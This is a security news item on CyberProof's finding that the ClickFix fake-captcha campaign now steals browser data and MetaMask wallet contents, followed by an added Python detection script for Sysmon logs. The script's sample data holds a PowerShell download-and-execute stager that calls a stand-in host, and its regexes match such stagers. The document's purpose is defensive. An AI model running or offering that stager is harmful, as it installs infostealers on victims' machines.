Originally reported by Hackread
TL;DR
CyberProof researchers document ClickFix operation's expansion into cryptocurrency theft, using fake captchas to deploy infostealers across 25+ browsers and MetaMask wallets.
This represents an evolution of an existing threat campaign targeting valuable assets like crypto wallets, but lacks indicators of mass exploitation or critical infrastructure impact.
CyberProof researchers have documented a significant expansion of the ClickFix operation, with threat actors now targeting cryptocurrency assets alongside traditional browser data theft. The campaign leverages fake captcha verification pages to socially engineer users into executing malicious PowerShell commands that deploy sophisticated infostealers.
The updated ClickFix campaign specifically targets:
The social engineering component remains consistent with previous ClickFix operations: users encounter what appears to be a legitimate captcha verification page. When they attempt to "verify" that they are human, they are instructed to copy and execute PowerShell commands, ostensibly to resolve a technical issue.
Once executed, the PowerShell payload deploys an infostealer capable of:
The targeting of MetaMask and other browser-based cryptocurrency wallets represents a notable evolution in the ClickFix operation's scope. Browser extension wallets store sensitive cryptographic material that, when compromised, provides direct access to victim cryptocurrency holdings without requiring additional authentication factors.
Security teams should monitor for:
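One way to turn the pattern described above into detection logic, as an added example that is not part of the CyberProof report or the original article: scan Sysmon process-creation events for PowerShell launched from the user's desktop session (explorer.exe, assumed to be the parent when a victim pastes a command into the Run dialog or Start menu) with command-line features typical of pasted stagers. The JSON field names, the heuristics and the three sample events are assumptions and constructed data, not indicators from the report.

```python
import json
import re
from typing import Optional

# Command-line features typical of one-liners a victim is told to paste
# (assumed heuristics, not indicators taken from the CyberProof report).
SUSPICIOUS = [
    r"-(?:w|win|windowstyle)\s+hidden",                     # hide the console window
    r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}",  # base64-encoded command
    r"\b(?:iex|invoke-expression)\b",                       # execute fetched text
    r"\b(?:iwr|invoke-webrequest|downloadstring)\b",        # fetch a remote stager
]
PATTERN = re.compile("|".join(SUSPICIOUS), re.IGNORECASE)

def classify(event: dict) -> Optional[dict]:
    """Return a finding for a Sysmon Event ID 1 record (JSON export field
    names assumed) that fits the ClickFix pattern, otherwise None."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return None
    # Assumption: a user pasting into the Run dialog or Start menu launches
    # PowerShell from explorer.exe. Scheduled tasks and installers have other
    # parents and belong to a separate, broader encoded-command rule.
    if not parent.endswith("explorer.exe"):
        return None
    hits = sorted({m.group(0) for m in PATTERN.finditer(cmd)})
    if not hits:
        return None
    return {"time": event.get("UtcTime"), "user": event.get("User"), "hits": hits}

def scan(lines) -> list:
    """Parse JSON-lines Sysmon events and collect ClickFix-style findings."""
    findings = []
    for line in lines:
        if line.strip():
            finding = classify(json.loads(line))
            if finding:
                findings.append(finding)
    return findings

# Constructed sample: a benign interactive command, a pasted ClickFix-style
# stager, and a scheduled task whose parent is not explorer.exe.
SAMPLE_EVENTS = r"""
{"UtcTime": "2025-01-15 09:12:03", "User": "CORP\\alice", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe Get-ChildItem C:\\Temp"}
{"UtcTime": "2025-01-15 09:14:41", "User": "CORP\\bob", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c iex((New-Object Net.WebClient).DownloadString('http://captcha.example/verify'))"}
{"UtcTime": "2025-01-15 09:15:00", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "powershell.exe -NoProfile -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"}
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS.splitlines()):
        print(finding)
```

The parent-process filter is a scoping choice for this pattern; encoded commands from any parent deserve their own rule, and the regex list should be tuned against the environment's own baseline of interactive PowerShell use.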